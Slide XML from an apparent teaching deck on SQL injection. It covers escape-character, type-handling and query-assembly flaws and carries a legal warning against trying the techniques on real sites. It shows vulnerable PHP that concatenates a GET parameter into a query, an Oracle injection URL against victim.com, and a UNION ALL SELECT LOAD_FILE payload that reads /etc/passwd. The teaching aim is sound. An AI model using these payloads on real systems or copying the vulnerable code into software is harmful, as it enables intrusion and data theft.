              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Incorrectly Handled Types</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Incorrectly Handled Query Assembly</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Incorrectly Handled Errors</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Incorrectly Handled Multiple Submissions</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Insecure Database Configuration</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>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10363835" cy="487045"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="+mj-lt"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t>Incorrectly Handled Escape Characters - Vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="1219200"/>
            <a:ext cx="8610600" cy="5410200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>SQL databases interpret the quote character (‘) as the boundary between the code and data. They assume that anything following a quote is a code that it needs to run and anything encapsulated by a quote is data. Therefore, you can quickly tell whether a Web site is vulnerable to SQL injection by simply typing a single quote in the URL or within a field in the Web page or application.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>If you enter the single-quote character as input to the application, you may be presented with either one of the following errors; the result depends on a number of factors, such as programming language and database in use, as well as protection and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>defense</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> technologies implemented:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Warning: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysql_fetch_assoc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(): supplied argument is not a valid MySQL result resource</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2900" dirty="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10100310" cy="487045"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="+mj-lt"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t>Incorrectly Handled Escape Characters - Exploitation</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="1371600"/>
            <a:ext cx="8610600" cy="5334000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The reason for the error is that the single-quote character has been interpreted as a string delimiter. Syntactically, the SQL query executed at runtime is incorrect (it has one too many string delimiters), and therefore the database throws an exception. The character is used in SQL injection attacks to “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>escape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>” the developer’s query so that the attacker can then construct his own queries and have them executed.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The single-quote character is not the only character that acts as an escape character; for instance, in Oracle, the blank space ( ), double pipe (||), comma (,), period (.), (∗/), and double-quote characters (“) have special meanings. For example:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-- The pipe character can be used to append a function to a value.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-- The function will be executed and the result cast and concatenated. http://victim.com/id=1||utl_inaddr.get_host_address(local)--</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>It is important to become familiar with all of the idiosyncrasies of the database you are attacking and/or defending.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>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8534400" cy="609600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="+mj-lt"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t>Incorrectly Handled Types - Vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="990600"/>
            <a:ext cx="8763000" cy="5715000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>When dealing with numeric data, it is not necessary to encapsulate the data within quotes. Here is an example of a simple application that passes user input directly to a dynamically created SQL statement. It accepts a numeric parameter (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" err="1"/>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>) and displays information about that user. The query assumes that the parameter will be an integer and so is written without quotes:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// build dynamic SQL statement</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$SQL = “SELECT ∗ FROM table WHERE field = $_GET[“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”]”;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// execute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> statement</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$result = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysql_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($SQL);</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// check to see how many rows were returned from the database</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rowcount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysql_num_rows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($result);</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// iterate through the record set returned</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$row = 1;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>while ($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>db_field</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysql_fetch_assoc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($result)) {</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> if ($row &lt;= $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rowcount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>){…  } }</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRP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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Warning!</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676400" y="1219200"/>
            <a:ext cx="8839200" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t>Do not try any of the techniques learnt here on any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="1" dirty="0"/>
              <a:t>real</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t> Web applications. </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>In the United Kingdom, you could be prosecuted under </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>the Computer Misuse Act of 1990 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>http://www.legislation.gov.uk/ukpga/1990/18/contents</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>the revised Police and Justice Act of 2006 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.legislation.gov.uk/ukpga/2006/48/contents</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>In the United States, you could be prosecuted under </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>the Computer Fraud and Abuse Act of 1986 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.justice.gov/criminal/cybercrime/docs/ccmanual.pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>the USA PATRIOT Act of 2001 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.gpo.gov/fdsys/pkg/PLAW-107publ56/pdf/PLAW-107publ56.pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>). </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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8534400" cy="609600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="+mj-lt"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t>Incorrectly Handled Types - Exploitation</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676400" y="990600"/>
            <a:ext cx="8915400" cy="5715000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Example: MySQL provides a function called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>LOAD_FILE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> that reads a file and returns the file contents as a string. The following statement, if entered as input, may allow an attacker to read the contents of the /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> file, which contains user attributes and usernames for system users:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1 UNION ALL SELECT LOAD_FILE(‘/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’)--</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The attacker’s input is directly interpreted as SQL syntax; so, there is no need for the attacker to escape the query with the single-quote character. Here is the SQL statement that is built:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT ∗ FROM TABLE</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE USERID = 1 UNION ALL SELECT LOAD_FILE(‘/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’)—</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="1400" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="1400" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" u="sng" dirty="0"/>
              <a:t>Note</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>To use the LOAD_FILE function, the file must be located on the database server host and the calling user must have the FILE privilege.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1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10241915" cy="533400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="+mj-lt"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t>Incorrectly Handled Query Assembly - Vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="1371600"/>
            <a:ext cx="8610600" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Some applications need to be coded with dynamic SQL statements, as the table or field that needs to be queried may not yet exist. An example is an application that stores data in tables that are created periodically for an employee’s time sheet. Each employee’s time sheet data is entered into a new table in a format that contains that month’s data (e.g., </a:t>
